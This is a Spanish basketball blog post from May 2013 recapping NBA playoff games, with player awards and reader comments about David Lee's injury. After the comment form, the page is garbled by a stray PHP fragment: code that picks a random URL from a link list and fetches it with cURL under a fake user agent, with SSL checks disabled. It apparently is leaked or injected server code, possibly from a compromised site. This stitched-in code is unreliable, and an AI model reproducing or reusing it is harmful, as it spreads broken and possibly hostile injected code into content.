La Crónica: They Believe!

03 de May de 2013 por MagicJohnson32

warriorsUna serie que se acaba, otra que se va al séptimo. La madrugada nos ha dejado el pase de los Warriors a segunda ronda de Playoffs y la victoria de los Nets en Chicago para poner el 3-3 en la eliminatoria. Abrimos la crónica, lógicamente, en Oakland, donde el extraordinario partido de Bogut y un tercer cuarto memorable (otro) de Stephen Curry acabaron prevaleciendo sobre el pésimo final de encuentro de los Warriors, que estuvieron a punto de tirar por la borda la suculenta renta acumulada tras un inicio dubitativo. Empezaron mejor los Nuggets y se pusieron 11 arriba (34-23) con Lawson, Chandler e Iguodala muy acertados de entrada, pero el encuentro se equilibró antes del descanso y, como ha venido siendo norma a lo largo de la eliminatoria, el tercer cuarto perteneció a Curry. Sus 4 triples, 14 puntos y 3 asistencias inclinaron el partido del lado local y la renta creció hasta los 18 puntos a 9 minutos para la conclusión. A partir de entonces, los Warriors se cortocircuitaron, perdieron nueve balones (4 de ellos el propio Curry) y los Nuggets, liderados por Iguodala, se quedaron a centímetros de completar la remontada (88-92). Fue noticia también el inspirador y puramente simbólico retorno de David Lee, al que se suponía lesionado por lo que resta de campaña pero que jugó poco más de un minuto. Veremos si el PF está en condiciones de contribuir en la segunda ronda, donde esperan Tim Duncan y sus Spurs.

netsTodavía no tienen rival los Heat después de que Brooklyn Nets venciesen en Chicago y forzasen el séptimo partido. Además de la baja de Rose, los Bulls se presentaron anoche sin Hinrich ni Deng, y con Nate Robinson y Taj Gibson tocados. Pero ya se sabe que bajo el mando de Thibodeau no se hacen concesiones y, si no está Deng, sale Belinelli y juega sus mejores 46 minutos de la temporada. La hiperactividad de Noah (9 rebotes ofensivos, 14 en total, además de 5 tapones y 5 asistencias) fue la imagen de estos Bulls, que aferrados a su propuesta con uñas y dientes, llegaron con posibilidades al tramo final. Pero en ese momento los Nets, comandados por un nuevo doble-doble de Deron Williams, contaron con Blatche, autor de los últimos cinco puntos de su equipo, todos y cada uno de ellos imprescindibles para sellar el resultado final (95-92). El séptimo y definitivo encuentro entre Nets y Bulls se disputará la madrugada del sábado al domingo a las 2h00 (hora española) en el Barclays Center de Brooklyn.

PREMIOS

MVP: Los Warriors se impusieron de la mano del mejor Andrew Bogut del año. Consiguió sus máximos registros de la temporada tanto en puntos (14) como en rebotes (21) y tapones (4).

Rookie: Harrison Barnes cierra la serie con otra correcta actuación (11 puntos y 5 rebotes) pero ayer fue Draymond Green uno de los grandes protagonistas del partido con 16 puntos y 10 rebotes.

Sorpresa: Andray Blatche jugó 19 minutos, anotó 10 puntos y capturó 7 rebotes, nada espectacular pero absolutamente decisivo si tenemos en cuenta que los últimos cinc puntos de los Nets, en un partido a vida o muerte, fueron suyos.

Decepción: Klay Thompson estuvo especialmente desacertado. Falló 10 de los 13 tiros que intentó y se quedó en 7 puntos. Wilson Chandler falló aún más: Anotó solo 5 de sus 17 intentos.

Esfuerzo en vano: Esta vez el buen partido de Andre Iguodala no encontró recompensa. Sus 24 puntos, 9 rebotes y 6 asistencias fueron estériles. En Chicago, Joakim Noah (14 puntos, 15 rebotes, 5 asistencias y 5 tapones) y Marco Bellinelli (22 puntos, 5 rebotes y 7 asistencias) se multiplicaron para cerrar la serie pero los Nets no se lo permitieron.

TOP 5

Imágenes | AP Photos / Getty Images

Comenta

7 comentarios a esta entrada

  1. MagicJohnson32 dice:
    #1

    Central de estadísticas TJ:

    – En los últimos 30 años, los Warriors se han metido 11 veces en Playoffs. De ellas, en 9 ocasiones pasaron a segunda ronda.
    – En los últimos 10 años, los Nuggets se han metido 10 veces en Playoffs. De ellas, en 1 ocasión pasaron a segunda ronda.
    – En sus 14 temporadas como profesional, Andre Miller no ha ganado una sola eliminatoria de Playoffs (¡y os reíais de McGrady!).

      Citar

  2. Denise dice:
    #2

    Bueno, sorprendente lo de la reaparición de Lee, entendida como un acto de motivación para el equipo. Lástima para los Warriors que tal y como ha declarado no va a estar en condiciones de ser un jugador importante en la eliminatoria vs Spurs.

    “Asked if he could play a big role against the Spurs, Lee said, “Significant part like playing 30 minutes? Zero chance”

      Citar

  3. R1Molano dice:
    #3

    Os copio lo que escribí en otro sitio sobre Lee:

    No hubo rotura, sino desgarro del musculo hip flexor, el desgarro según el grado que tuviera podía suponer inmovilización desde 4-5 días, lo que vendría a ser una sobrecarga (leve), inmovilización y reposo de dos o tres semanas (medio) o ser un desgarro importante de 3 meses de recuperación.

    Los Warriors parece que dejaron caer que la lesión estaba entre el grado medio e incluso el grave (algún periodista hablo de 5 o 6 meses de baja, lo que el médico desmintió). Parece ser que como hicimos toda la serie jugamos un poco al engaño porque no salió de manera testimonial, realmente estaba para 8-10 minutos, podía correr, podía saltar, lo que pasa que apenas puede meterle carga al musculo, porque podría desgarrarlo más o incluso en el peor de los casos romperlo.

    En todo caso, las noticias son muy buenas, verlo saltando o haciendo mates significa que la lesión ha sido mas un tirón o pequeño desgarro y así se evita la parte mala de la lesión, que siempre es importante de cara al futuro que Lee se recupere en el tiempo de vacaciones y a partir de Agosto pueda trabajar (primero individualmente, luego con el equipo) con normalidad.

    En todo caso, anoche se le uso mas para despistar que otra cosa (Jackson lo anuncio como titular y fue presentado así incluso), aparte de para el golpe moral, que siempre viene bien. obviamente hay que tener cuidado no vaya a hacer un desgarro importante o incluso rotura.

    Decían que hoy iba a entrenar y que seguirían viendo como va, los primeros partidos podrá echar una mano, si la cosa va mejorando incluso hacer un aporte de 15-20 minutos, pero siempre muy sueltos porque no pueden sobrecargar la zona.
    Tampoco creo que vayan a arriesgar, el equipo se marco como un objetivo pasar esta ronda, pero contra San Antonio viendo los precedentes, las experiencias de ambos equipos y tal… Jackson ya se ha descargado de responsabilidad y se ve como una eliminatoria sin nada que perder.

    En todo caso, la mejor noticia con Lee es esa, que esta bien y que la lesión no fue grave, pueda o no pueda apenas participar en la serie contra los Spurs.

      Citar

  4. HisRoyalAirness dice:
    #4

    Estaba flipando ayer con lo de Lee y comentándolo en twitter con Gonzalo Vazquez. Me parecía imposible (porque, para mí desgracia, he estudiado medicina) y así fue.
    Los Spurs se los van a merendar y me veo otro (4-0). Pero que les quiten lo bailao.

      Citar

  5. HisRoyalAirness dice:
    #5

    Bueno, me parece que se me ha adelantado un dottore

      Citar

  6. Esteban dice:
    #6

    Bogut, todo un año en blanco, justifica su contrato rompiendola en el partido mas importante de la ttemporada

    A q monta ellis ayer no jugaba asi

      Citar

  7. Esteban dice:
    #7

    Q futuro pintan etos warriors eh, en segunda ronda, con curry cuarto año thompeson segundo, barnes green y ezeli rookies

    Y lo contratos de briednisy jefferon a punto de expirar

    Tienen todo para ser el rival de thunder en la proxima decada

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>